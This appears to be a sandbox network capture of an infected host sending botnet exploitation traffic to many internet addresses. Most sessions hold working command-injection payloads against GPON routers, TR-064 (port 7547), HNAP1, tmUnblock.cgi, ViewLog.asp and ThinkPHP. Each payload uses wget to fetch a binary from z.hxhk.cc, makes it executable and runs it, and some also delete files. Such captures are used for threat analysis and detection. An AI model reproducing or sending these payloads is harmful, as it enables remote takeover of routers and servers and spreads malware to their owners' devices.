Mar 18, 2024 09:57:04.020555973 CET	307	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Mon, 18 Mar 2024 08:57:03 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
116	192.168.2.23	52262	46.148.230.114	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:04.031856060 CET	310	OUT	POST /GponForm/diag_Form?images/ HTTP/1.1 User-Agent: Hello, World Accept: / Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 7a 2e 68 78 68 6b 2e 63 63 2f 67 70 6f 6e 34 34 33 2b 2d 4f 2b 2f 74 6d 70 2f 67 61 66 3b 73 68 2b 2f 74 6d 70 2f 67 61 66 2b 67 34 34 33 60 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://z.hxhk.cc/gpon443+-O+/tmp/gaf;sh+/tmp/gaf+g443`&ipv=0
Mar 18, 2024 09:57:04.233416080 CET	339	IN	HTTP/1.1 400 Bad Request Server: nginx/1.18.0 (Ubuntu) Date: Mon, 18 Mar 2024 08:57:04 GMT Content-Type: text/html Content-Length: 166 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
117	192.168.2.23	58342	99.243.200.180	7547

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:04.039741039 CET	747	OUT	POST /UD/act?1 HTTP/1.1 Host: 127.0.0.1:7547 User-Agent: r00ts3c-owned-you SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers Content-Type: text/xml Content-Length: 526 <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://z.hxhk.cc/sys64.mips; chmod 777 sys64.mips; ./sys64.mips tr.s`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port
118	192.168.2.23	54130	95.82.53.178	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:04.149554014 CET	308	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: r00ts3c-owned-you
Mar 18, 2024 09:57:08.329408884 CET	308	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: r00ts3c-owned-you
Mar 18, 2024 09:57:14.487417936 CET	308	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: r00ts3c-owned-you
Mar 18, 2024 09:57:51.345045090 CET	308	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: r00ts3c-owned-you
Mar 18, 2024 09:58:40.476416111 CET	308	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: r00ts3c-owned-you

Session ID	Source IP	Source Port	Destination IP	Destination Port
119	192.168.2.23	44484	14.88.152.52	7547

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:04.179419994 CET	747	OUT	POST /UD/act?1 HTTP/1.1 Host: 127.0.0.1:7547 User-Agent: r00ts3c-owned-you SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers Content-Type: text/xml Content-Length: 526 <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://z.hxhk.cc/sys64.mips; chmod 777 sys64.mips; ./sys64.mips tr.s`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port
120	192.168.2.23	58354	85.100.207.144	8081

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:04.245732069 CET	776	OUT	POST /HNAP1/ HTTP/1.0 Content-Type: text/xml; charset="utf-8" SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://z.hxhk.cc/sys64.mips && chmod +x sys64.mips;./sys64.mips hn.s` Content-Length: 640 Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Mar 18, 2024 09:57:04.502656937 CET	135	IN	HTTP/1.1 401 Unauthorized Connection: Keep-Alive WWW-Authenticate: Basic realm="HuaweiHomeGateway" Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
121	192.168.2.23	48658	172.65.156.227	8080

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:04.326617956 CET	124	OUT	POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus. Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port
122	192.168.2.23	32788	172.105.76.123	8080

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:04.406395912 CET	124	OUT	POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus. Data Raw: Data Ascii:
Mar 18, 2024 09:57:04.575077057 CET	242	IN	HTTP/1.1 400 Illegal character SPACE=' ' Content-Type: text/html;charset=iso-8859-1 Content-Length: 70 Connection: close Server: Jetty(9.4.42.v20210604) Data Raw: 3c 68 31 3e 42 61 64 20 4d 65 73 73 61 67 65 20 34 30 30 3c 2f 68 31 3e 3c 70 72 65 3e 72 65 61 73 6f 6e 3a 20 49 6c 6c 65 67 61 6c 20 63 68 61 72 61 63 74 65 72 20 53 50 41 43 45 3d 27 20 27 3c 2f 70 72 65 3e Data Ascii: <h1>Bad Message 400</h1><pre>reason: Illegal character SPACE=' '</pre>

Session ID	Source IP	Source Port	Destination IP	Destination Port
123	192.168.2.23	48192	172.65.52.251	8080

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:04.413542032 CET	124	OUT	POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus. Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port
124	192.168.2.23	57106	112.166.160.243	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:04.430380106 CET	320	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: r00ts3c-owned-you
Mar 18, 2024 09:57:04.856008053 CET	595	IN	Data Raw: 68 69 6e 6b 07 70 70 2f 69 6e 76 6f 6b 65 66 75 6e 63 74 69 6f 6e 26 66 75 6e 63 74 69 6f 6e 3d 63 61 6c 6c 5f 75 73 65 72 5f 66 75 6e 63 5f 61 72 72 61 79 26 76 61 72 73 5b 30 5d 3d 73 68 65 6c 6c 5f 65 78 65 63 26 76 61 72 73 5b 31 5d 5b 5d 3d Data Ascii: hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 404 Not FoundContent-Type: text/htmlContent-Length: 341Date: Mon, 18 Mar 2024 17:59:47 GMTServer: nawsd/1.0.1-20211228X-Frame-Options: SAMEORIGIN<

Session ID	Source IP	Source Port	Destination IP	Destination Port
125	192.168.2.23	44494	14.88.152.52	7547

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:04.459542990 CET	747	OUT	POST /UD/act?1 HTTP/1.1 Host: 127.0.0.1:7547 User-Agent: r00ts3c-owned-you SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers Content-Type: text/xml Content-Length: 526 <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://z.hxhk.cc/sys64.mips; chmod 777 sys64.mips; ./sys64.mips tr.s`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope Data Raw: Data Ascii:
Mar 18, 2024 09:57:04.821897984 CET	747	OUT	POST /UD/act?1 HTTP/1.1 Host: 127.0.0.1:7547 User-Agent: r00ts3c-owned-you SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers Content-Type: text/xml Content-Length: 526 <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://z.hxhk.cc/sys64.mips; chmod 777 sys64.mips; ./sys64.mips tr.s`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port
126	192.168.2.23	55390	172.88.86.134	8080

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:04.572024107 CET	124	OUT	POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus. Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port
127	192.168.2.23	47588	44.202.167.15	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:04.748374939 CET	310	OUT	POST /GponForm/diag_Form?images/ HTTP/1.1 User-Agent: Hello, World Accept: / Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 7a 2e 68 78 68 6b 2e 63 63 2f 67 70 6f 6e 34 34 33 2b 2d 4f 2b 2f 74 6d 70 2f 67 61 66 3b 73 68 2b 2f 74 6d 70 2f 67 61 66 2b 67 34 34 33 60 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://z.hxhk.cc/gpon443+-O+/tmp/gaf;sh+/tmp/gaf+g443`&ipv=0
Mar 18, 2024 09:57:04.847516060 CET	355	IN	HTTP/1.1 400 Bad Request Server: nginx/1.10.3 (Ubuntu) Date: Mon, 18 Mar 2024 08:57:04 GMT Content-Type: text/html Content-Length: 182 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 30 2e 33 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.10.3 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
128	192.168.2.23	39946	18.245.75.170	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:04.817682981 CET	310	OUT	POST /GponForm/diag_Form?images/ HTTP/1.1 User-Agent: Hello, World Accept: / Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 7a 2e 68 78 68 6b 2e 63 63 2f 67 70 6f 6e 34 34 33 2b 2d 4f 2b 2f 74 6d 70 2f 67 61 66 3b 73 68 2b 2f 74 6d 70 2f 67 61 66 2b 67 34 34 33 60 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://z.hxhk.cc/gpon443+-O+/tmp/gaf;sh+/tmp/gaf+g443`&ipv=0
Mar 18, 2024 09:57:04.986934900 CET	1275	IN	HTTP/1.1 400 Bad Request Server: CloudFront Date: Mon, 18 Mar 2024 08:57:04 GMT Content-Type: text/html Content-Length: 915 Connection: close X-Cache: Error from cloudfront Via: 1.1 13ad77f5993668d67b8168f460ba6368.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA60-P6 X-Amz-Cf-Id: I_RWZKTnT3HfoXJDpNHxkctZCQYWOvmAdIFTt8swqPZMxJP40tdNJg== Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 6c 6f 6f 73 65 2e 64 74 64 22 3e 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 4f 4e 54 45 4e 54 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 3e 0a 3c 54 49 54 4c 45 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 73 61 74 69 73 66 69 65 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 34 30 30 20 45 52 52 4f 52 3c 2f 48 31 3e 0a 3c 48 32 3e 54 68 65 20 72 65 71 75 65 73 74 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 73 61 74 69 73 66 69 65 64 2e 3c 2f 48 32 3e 0a 3c 48 52 20 6e 6f 73 68 61 64 65 20 73 69 7a 65 3d 22 31 70 78 22 3e 0a 42 61 64 20 72 65 71 75 65 73 74 2e 0a 57 65 20 63 61 6e 27 74 20 63 6f 6e 6e 65 63 74 20 74 6f 20 74 68 65 20 73 65 72 76 65 72 20 66 6f 72 20 74 68 69 73 20 61 70 70 20 6f 72 20 77 65 62 73 69 74 65 20 61 74 20 74 68 69 73 20 74 69 6d 65 2e 20 54 68 65 72 65 20 6d 69 67 68 74 20 62 65 20 74 6f 6f 20 6d 75 63 68 20 74 72 61 66 66 69 63 20 6f 72 20 61 20 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 65 72 72 6f 72 2e 20 54 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 2c 20 6f 72 20 63 6f 6e 74 61 63 74 20 74 68 65 20 61 70 70 20 6f 72 20 77 65 62 73 69 74 65 20 6f 77 6e 65 72 2e 0a 3c 42 52 20 63 6c 65 61 72 3d 22 61 6c 6c 22 3e 0a 49 66 20 79 6f 75 20 70 72 6f 76 69 64 65 20 63 6f 6e 74 65 6e 74 20 74 6f 20 63 75 73 74 6f 6d 65 72 73 20 74 68 72 6f 75 67 68 20 43 6c 6f 75 64 46 72 6f 6e 74 2c 20 79 6f 75 20 63 61 6e 20 66 69 6e 64 20 73 74 65 70 73 20 74 6f 20 74 72 6f 75 62 6c 65 73 68 6f 6f 74 20 61 6e 64 20 68 65 6c 70 20 70 72 65 76 65 6e 74 20 74 68 69 73 20 65 72 72 6f 72 20 62 79 20 72 65 76 69 65 77 69 6e 67 20 74 68 65 20 43 6c 6f 75 64 46 72 6f 6e 74 20 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 0a 3c 42 52 20 63 6c 65 61 72 3d 22 61 6c 6c 22 3e 0a 3c 48 52 20 6e 6f 73 68 61 64 65 20 73 69 7a 65 3d 22 31 70 78 22 3e 0a 3c 50 52 45 3e 0a 47 65 6e 65 72 61 74 65 64 20 62 79 20 63 6c 6f 75 64 66 72 6f 6e 74 20 28 43 6c 6f 75 64 46 72 6f 6e 74 29 0a 52 65 71 75 65 73 74 20 49 44 3a 20 49 5f 52 57 5a 4b 54 6e 54 33 48 66 6f 58 4a 44 70 4e 48 78 6b 63 74 5a 43 51 59 57 4f 76 6d 41 64 49 46 54 74 38 73 77 71 50 5a 4d 78 4a 50 34 30 74 64 4e 4a 67 3d 3d 0a 3c 2f 50 52 45 3e 0a 3c 41 44 44 52 45 53 53 3e 0a 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><HTML><HEAD><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1"><TITLE>ERROR: The request could not be satisfied</TITLE></HEAD><BODY><H1>400 ERROR</H1><H2>The request could not be satisfied.</H2><HR noshade size="1px">Bad request.We can't connect to the server for this app or website at this time. There might be too much traffic or a configuration error. Try again later, or contact the app or website owner.<BR clear="all">If you provide content to customers through CloudFront, you can find steps to troubleshoot and help prevent this error by reviewing the CloudFront documentation.<BR clear="all"><HR noshade size="1px"><PRE>Generated by cloudfront (CloudFront)Request ID: I_RWZKTnT3HfoXJDpNHxkctZCQYWOvmAdIFTt8swqPZMxJP40tdNJg==</PRE><ADDRESS></ADDRESS></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
129	192.168.2.23	45474	83.96.215.99	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:05.004813910 CET	454	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 127.0.0.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: r00ts3c-owned-you Content-Length: 176 Content-Type: application/x-www-form-urlencoded Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 7a 2e 68 78 68 6b 2e 63 63 2f 73 79 73 36 34 2e 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 73 79 73 36 34 2e 61 72 6d 37 3b 2e 2f 73 79 73 36 34 2e 61 72 6d 37 2b 7a 79 2e 73 3b 72 6d 2b 2d 72 66 2b 73 79 73 36 34 2e 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://z.hxhk.cc/sys64.arm7;chmod+777+sys64.arm7;./sys64.arm7+zy.s;rm+-rf+sys64.arm7%3b%23&remoteSubmit=Save
Mar 18, 2024 09:57:05.170082092 CET	358	IN	HTTP/1.1 302 Moved Temporarily Server: nginx Date: Mon, 18 Mar 2024 08:57:05 GMT Content-Type: text/html Content-Length: 138 Connection: keep-alive Location: https://www.xsarus.nl/registered-domain/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>
